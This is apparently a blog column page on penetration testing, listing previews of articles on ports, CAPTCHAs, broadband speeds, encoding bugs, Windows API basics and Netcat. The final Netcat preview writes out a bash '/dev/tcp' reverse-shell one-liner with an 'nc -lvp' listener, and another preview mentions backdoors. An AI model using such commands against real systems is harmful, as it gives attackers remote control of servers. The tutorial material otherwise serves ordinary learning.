![](https://img-blog.csdnimg.cn/20190918140037908.png?x-oss-process=image/resize,m_fixed,h_224,w_224)
安全渗透
关于安全渗透
没读过书的孩子
这个作者很懒,什么都没留下…
展开
-
计算机网络===内网,外网,端口,映射
首先我们要了解到一个概念:端口:可以认为是设备与外界通讯交流的出口。端口可分为虚拟端口和物理端口,其中虚拟端口指计算机内部或交换机路由器内的端口,不可见。例如计算机中的80端口、21端口、23端口等。物理端口又称为接口,是可见端口,计算机背板的RJ45网口,交换机路由器集线器等RJ45端口。电话使用RJ11插口也属于物理端口的范畴。详解:如果把IP地址比作一间房子 ,端口就是出入这间房子的门...原创 2018-11-06 11:29:52 · 6585 阅读 · 0 评论 -
登陆网站时验证码有什么作用
没有验证码登陆,黑客会更加容易破解你的账号,通过组合码刷机等黑客技术来破取你的密码,有了验证码相当于加了一层很厚的屏障,安全系数很高。 验证码是一种区分用户是计算机和人的公共全自动程序。 验证码作用:可以防止恶意破解密码、刷票、论坛灌水,有效防止某个黑客对某一个特定注册用户用特定程序暴力破解方式进行不断的登陆尝试,实际上是用验证码是现在很多网站通行的方式(比如招商银行的网上个人银行,百度社...原创 2018-10-03 09:31:37 · 12140 阅读 · 0 评论 -
宽带常见的有20 30 50 100兆指的是什么意思???
宽带常见的有20 30 50 100兆宽带,那么我们需要了解到下面的:1. 20 30 50 100“兆”是什么?100M其实是100M Byte,我们所说的网速是指的Bit,而1Bit = 8 Byte,所以100M其实是12.5M的网速,但实际可能达不到。2. 下图是宽带对应的速度范围(不为标准)3.了解:光纤,是光导纤维的简写,是一种利用光在玻璃或塑料制成的纤维中...原创 2018-09-16 13:16:06 · 20933 阅读 · 1 评论 -
request、response 中文乱码问题与解决方式
request乱码指的是:浏览器向服务器发送的请求参数中包含中文字符,服务器获取到的请求参数的值是乱码;response乱码指的是:服务器向浏览器发送的数据包含中文字符,浏览器中显示的是乱码;乱码产生的原因:不管是request乱码还是response乱码,其实都是由于客户端(浏览器)跟服务器端采用的编码格式不一致造成的。以request乱码为例:浏览器向服务器发送请求,因为浏览器与服务器...转载 2018-07-02 08:52:51 · 4427 阅读 · 0 评论 -
【安全渗透】Windows应用程序基本概念
若想使用Python对Windows应用程序进行黑客攻击,必须拥有Windows API基础知识。Windows API是微软提供的应用程序编程接口集合。开发应用程序时,需要通过API调用操作系统(内核)提供的丰富功能。常用的32位Windows环境中,提供名为Win32的Windows API。开发Windows应用程序时,往往要使用各种lib和DLL库。lib是静态库,生成Windows...原创 2020-02-24 18:39:28 · 2346 阅读 · 0 评论 -
【工具】Netcat(1)基本使用
一.概述netcat是一款基于tcp/ip协议(c/s模型的)的工具。netcat的功能包括:数据传输文件传输建立后门端口转发内外网突破二.基础使用方法创建一个服务器端:nc -l -p [local_port]nc -l -p 2222//-l 表示启动监听模式,-p监听端口号创建一个客户端:nc [remote_addr] [remote_port]nc 19...原创 2020-02-21 13:57:38 · 2876 阅读 · 0 评论 -
【工具】Netcat(2)反弹shell
应用场景:某些拿到服务器权限之后,想要设置一个反弹shell。但是目标服务器上没有安装Netcat时。1.反弹shell(bash)反弹shell命令:bash -i >& /dev/tcp/ip/port 0>&1pc接受netcat命令:nc -lvp portbash -i表示以交互模式运行bash shell。重定向符>&,如果在其后加文...原创 2020-02-21 06:38:01 · 2946 阅读 · 0 评论